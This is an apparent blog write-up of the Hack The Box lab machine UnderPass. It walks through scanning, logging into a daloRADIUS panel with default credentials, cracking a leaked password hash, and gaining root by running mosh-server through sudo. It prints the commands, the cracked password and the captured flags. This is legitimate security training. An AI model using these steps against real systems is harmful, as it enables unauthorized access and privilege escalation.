Hackthebox: UnderPass

Foued SAIDI Lv4
  2025-05-10 17:10:21 2025-05-10 17:10:21 Created   2025-05-10 17:10:21 2025-05-10 17:10:21 Updated    

Overview

UnderPass is an easy-difficulty machine from Hack The Box dealing initially with an exposed Daloradius instance where we can use default credentials to gain Administrator privileges and exfiltrate a user’s hash that’ll allow us to get user flag. We’ll then abuse sudo privileges on mosh-server by taking the key and connecting to the instance that’s running with high privileges to gain root access.

UnderPass-info-card
UnderPass-info-card

Reconnaissance

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
PS C:\Users\foued> nmap -A -Pn 10.10.11.48 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-01 10:17 W. Central Africa Standard Time
Nmap scan report for 10.10.11.48
Host is up (0.47s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.77 seconds

We can see that we have our usual ssh 22 port and a web application deployed on port 80.

Directory bruteforcing

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
PS C:\Users\foued\Desktop\Tools\SecLists-master> feroxbuster -u http://10.10.11.48 -w .\Discovery\Web-Content\common.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher πŸ€“                 ver: 2.8.0
───────────────────────────┬──────────────────────
 🎯  Target Url            β”‚ http://10.10.11.48
 πŸš€  Threads               β”‚ 50
 πŸ“–  Wordlist              β”‚ .\Discovery\Web-Content\common.txt
 πŸ‘Œ  Status Codes          β”‚ All Status Codes!
 πŸ’₯  Timeout (secs)        β”‚ 7
 🦑  User-Agent            β”‚ feroxbuster/2.8.0
 🏁  HTTP methods          β”‚ [GET]
 πŸ”ƒ  Recursion Depth       β”‚ 4
 πŸŽ‰  New Version Available β”‚ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menuβ„’
──────────────────────────────────────────────────
WLD        -         -         -         - http://10.10.11.48 => auto-filtering 404-like response (9 lines); toggle this behavior by using --dont-filter
200      GET      363l      961w    10671c http://10.10.11.48/
200      GET       12l       11w      221c http://10.10.11.48/daloradius/.gitignore
200      GET      412l     3898w    24703c http://10.10.11.48/daloradius/ChangeLog
200      GET      340l     2968w    18011c http://10.10.11.48/daloradius/LICENSE
200      GET      363l      961w    10671c http://10.10.11.48/index.html
[###########>--------] - 3m     29495/52217   2m      found:5       errors:4581
[####################] - 1m      4751/4747    50/s    http://10.10.11.48/
[####################] - 2m      4751/4747    34/s    http://10.10.11.48/daloradius/
[##################>-] - 2m      4479/4747    28/s    http://10.10.11.48/daloradius/app/
[#############>------] - 2m      3247/4747    21/s    http://10.10.11.48/daloradius/contrib/
[###############>----] - 2m      3629/4747    24/s    http://10.10.11.48/daloradius/doc/
[############>-------] - 2m      3023/4747    22/s    http://10.10.11.48/daloradius/app/common/
[#######>------------] - 2m      1668/4747    13/s    http://10.10.11.48/daloradius/library/
[########>-----------] - 1m      2020/4747    19/s    http://10.10.11.48/daloradius/contrib/db/
[##>-----------------] - 1m       639/4747    7/s     http://10.10.11.48/daloradius/setup/
[#####>--------------] - 1m      1278/4747    16/s    http://10.10.11.48/daloradius/doc/install/
[--------------------] - 0s         0/4747    0/s     http://10.10.11.48/daloradius/app/users/

Daloradius Web Application - http://10.10.11.48/daloradius/app/operators

Using feroxbusted we identified that there is a daloradius instance which is an advanced RADIUS web management application for managing hotspots and general-purpose ISP deployments.
Looking at the app source code on github we can identify potential endpoints, one interesting one was /daloradius/app/operators:

Daloradius instance
Daloradius instance

Looking for default credentials for this instance we can find administrator:radius, we try it and we’re in:

Daloradius instance
Daloradius instance

Navigating through the app we can list user under http://10.10.11.48/daloradius/app/operators/mng-list-all.php :

Daloradius instance
Daloradius instance

And that’s where we can find the hash for svcMosh user: 412DD4759978ACFCC81DEAB01B382403
We can instantly go to https://crackstation.net/ and we’ll crack the hash over there: underwaterfriends, we can now use these credentials to login as ssh and claim our user flag:

1
2
3
4
5
svcMosh@underpass:~$ id
uid=1002(svcMosh) gid=1002(svcMosh) groups=1002(svcMosh)
svcMosh@underpass:~$ cat user.txt
bbfc40fc1389516f00b23bcb62c85872
svcMosh@underpass:~$

Privilege Escalation - Mosh server abuse

Now looking at what we can execute as sudo with svcMosh:

1
2
3
4
5
6
svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server

We can see that we can execute /usr/bin/mosh-server as sudo.

What we can do is simply run sudo /usr/bin/mosh-server and on another ssh session run MOSH_KEY=<mosh-key-value> mosh-client 127.0.0.1 60001 to get root access:
Step 1:

1
2
3
4
5
6
7
8
9
10
11
12
13
svcMosh@underpass:~$ sudo /usr/bin/mosh-server


MOSH CONNECT 60001 gb2KiBoIqYfjTKQs0Z4pxA

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <[email protected]>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 4397]
svcMosh@underpass:~$

Step 2:

1
2
3
4
5
root@underpass:~# id
uid=0(root) gid=0(root) groups=0(root)
root@underpass:~# cat /root/root.txt
95bfbcdd99b59de1bead0d706a1c6774
root@underpass:~#

And that was it for UnderPass, hope you learned something new!
-0xkujen

  • Title: Hackthebox: UnderPass
  • Author: Foued SAIDI
  • Created at : 2025-05-10 17:10:21
  • Updated at : 2025-05-10 17:10:21
  • Link: https://kujen5.github.io/2025/05/10/Hackthebox-UnderPass/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
Hackthebox: UnderPass
  1. Overview
  2. Reconnaissance
  3. Daloradius Web Application - http://10.10.11.48/daloradius/app/operators
  4. Privilege Escalation - Mosh server abuse